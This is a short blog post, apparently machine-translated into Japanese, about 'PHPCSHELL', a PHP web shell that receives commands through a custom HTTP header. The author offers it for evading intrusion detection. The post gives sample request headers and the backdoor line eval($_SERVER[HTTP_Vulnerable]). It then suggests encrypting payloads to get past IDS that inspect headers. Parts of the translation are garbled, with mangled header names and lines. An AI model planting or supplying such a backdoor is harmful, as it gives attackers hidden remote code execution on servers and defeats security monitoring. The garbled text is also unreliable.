http://www.vul.kr/?p=455 著者:TTFCT
2006 年に、HTTP HEADER がカスタマイズできることを発見し、2006 年 8 月に PHPCSHELL C/S TOOL を完成させ、それ以来、このツールを使用して IDS を回避しました。 WSC POST の送信が正常に接続できないという問題があり、PHPCSHELL を使用して正常に接続しました。それ以来、それを使用しています。隠蔽性は非常に優れています。
ここまで述べたところで、PHPCSHELL の原理を説明します:
まずHTTPヘッダーを見てみましょう
GET / HTTP/1.1
受け入れる: image/gif、image/jpeg、image/pjpeg、application/x-ms-application、application/vnd.ms-xpsdocument、application/xaml+xml、application/x-ms- xbap、application/vnd.ms-excel、application/vnd.ms-powerpoint、application/msword、application/x-shockwave-flash、*/*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 ( MSIE 8.0; Trident/4.0; .NET CLR 3.0.30729;
エンコーディング: gzip、deflate : www.vul.kr
接続: Keep-Alive
Cookie: www.vul.kr
脆弱性: www.vul.kr へようこそ
GET / HTTP/1.1
受け入れる: image/gif、image/jpeg、image/pjpeg、application/x-ms-application、application/vnd.ms-xpsdocument、application/xaml+xml、application/x-ms- xbap、application/vnd.ms-excel、application/vnd.ms-powerpoint、application/msword、application/x-shockwave-flash、*/*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (互換性; MSIE 8.0; Trident/4.0; .NET CLR 3.0.30729; : www.vul.kr
脆弱性: www.vul.kr へようこそ
接続: キープアライブ
Cookie: websitecookie
サーバー側の受信コードは次のとおりです:
echo ($_SERVER[HTTP_Vulnerable]);
?>
HTTPパケットNCを送信すると、「www.vul.krへようこそ」が表示され、HTTPヘッダーにカスタマイズされた情報が取得されます。もちろん、HTTPのPOSTとGETのデータは1つの文にすることができます。 HEADER パケットが送信される これも可能で、一部の IDS をバイパスできるため、私は常に PHPCSHELL を使用しています。
eval($_SERVER[HTTP_Vulnerable]);?>
典型的な文になりましたか? :)
一部の IDS は非常に BT で、HTTP ヘッダーをチェックします。これを回避する方法はまだあります。パケットを暗号化し、実行する前にサーバー側で復号化します。
PHPCSHELL図、本当はWSCと同じ機能を持たせたかったのですが、作業量が多すぎて書く時間がありません。
追記: HTTP ヘッダーの送信には文字制限があり、許可される文字の長さは 8184 です。